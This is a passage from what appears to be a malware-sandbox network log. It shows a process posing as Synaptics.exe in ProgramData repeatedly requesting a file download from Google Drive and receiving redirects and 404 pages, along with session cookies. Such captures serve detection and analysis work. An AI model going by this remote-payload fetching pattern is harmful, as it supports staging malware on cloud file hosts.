2024-12-30 10:41:41 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC434Tpe3LRzMGiEBQQdeHxBqH474tMTKmu8-nvmxX2WFEB3vMTpLKpN702tSGKw6Xr4cgE25CM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:41 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-JzDbd9OoYl_Zfelp25Co0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:41 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:41 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 78 74 41 59 73 4b 47 64 5a 32 61 7a 52 6d 79 4d 41 74 64 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="-xtAYsKGdZ2azRmyMAtdYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:41 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49917	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:42 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:42 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7EVfhr5JorogN8ZS0CaeeV5ekYmZHDksOctFMgEKJxSsXO3LK4D8R3wXSKYClzDfjovzNqdMA Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:42 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-4Du0vK-dM4K9QQqUWLW6RA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:42 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:42 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 45 44 44 67 50 2d 5a 79 71 51 41 65 67 35 49 5a 74 69 6e 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="IEDDgP-ZyqQAeg5IZtinaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:42 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49918	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:42 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
2024-12-30 10:41:42 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:42 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-R1KI_HX-goJSmcEE1T7sHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49919	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:42 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
2024-12-30 10:41:42 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:42 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-4ueBlOwB2pj2gjypz9SsXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49920	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:42 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:42 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5EM5FQbaT4BnaE5UXD2HQVHrw4T__XFxnbmQrIUJ9Dp74p5s321sZx8-Dl9KFHp2UZfS8-j80 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:42 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-NBf-UXn2rjZcfTmHFJejiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:42 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:42 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 32 31 42 55 73 50 44 6b 45 30 31 30 42 31 67 47 6f 78 38 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="y21BUsPDkE010B1gGox8HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:42 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49930	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:43 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=RptK4L7-WcWnn1WOnOAfqFyy7_is62_P0cYNzDuKNSqORBA5edKlGKJ4_MBrWBgYUlr_8a7xKgqcwsKSMfevphtta04k_tNz4OGERqeeLgoTez6yHhodBUes5PKV7f7DeKNjLKKBL5a8HWZ176A_kZutXgBG2O1OsWe45NsBGB33F8GeeHyD3Bw
2024-12-30 10:41:44 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:43 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-VoucAMuiiId_Tgb7W2r6FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49931	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:43 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:44 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:43 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-AUXOIVlz9Ape0efwe1U_NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49934	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:43 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:44 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4JMXh-KtOXQQawajVqXNgbJ0K3W0ktu3bkfFjL5umgtt4K2KxoMQ9rxO-3lCfmjkNICaMmJhI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:44 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-xxm--gHcQxCyLFH9iUGEKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:44 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:44 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 47 77 61 71 39 42 4d 42 46 57 33 72 7a 7a 31 35 67 58 5a 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="HGwaq9BMBFW3rzz15gXZKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:44 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

